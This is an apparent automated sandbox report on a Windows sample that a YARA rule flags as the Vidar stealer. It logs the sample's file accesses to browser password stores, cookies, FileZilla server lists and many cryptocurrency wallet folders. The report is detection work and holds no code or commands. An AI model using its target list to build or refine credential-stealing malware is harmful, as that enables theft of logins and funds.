Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_0096E5F4 GetLocalTime,

21_2_0096E5F4

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_0096E652 GetUserNameW,

21_2_0096E652

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Code function: 21_2_0094BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

21_2_0094BCD2

Source: C:\Users\user\AppData\Local\Temp\yoda.exe

Code function: 11_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

11_2_00406831

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 21.2.Iceland.com.42f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.3337432353.0000000003FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2446949939.000000000171B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3335415004.000000000177F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2446545610.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2446576253.0000000004015000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3341880599.00000000042F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2446692096.00000000042F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Iceland.com PID: 2800, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Iceland.com, 00000015.00000002.3331406035.00000000011D1000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: electrum.*
Source: Iceland.com, 00000015.00000002.3341880599.000000000449C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: Iceland.com, 00000015.00000002.3341880599.000000000449C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: Iceland.com, 00000015.00000002.3341880599.000000000449C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Iceland.com, 00000015.00000002.3341880599.000000000449C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: Iceland.com, 00000015.00000002.3341880599.000000000449C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Exodus\
Source: Iceland.com, 00000015.00000002.3341880599.000000000449C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: Iceland.com, 00000015.00000002.3341880599.000000000449C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: Iceland.com, 00000015.00000002.3341880599.000000000449C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: Iceland.com, 00000015.00000002.3341880599.000000000449C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: Iceland.com, 00000015.00000002.3331406035.00000000011D1000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: exodus.*
Source: Iceland.com, 00000015.00000002.3331406035.00000000011D1000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: ethereum.*
Source: Iceland.com, 00000015.00000002.3341880599.000000000449C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: Iceland.com, 00000015.00000002.3341880599.000000000449C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: Iceland.com, 00000015.00000002.3341880599.000000000449C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: MultiDoge
Source: Iceland.com, 00000015.00000002.3341880599.000000000449C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: powershell.exe, 00000003.00000002.2123581484.000001A510071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
Source: Iceland.com, 00000015.00000002.3341880599.000000000449C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
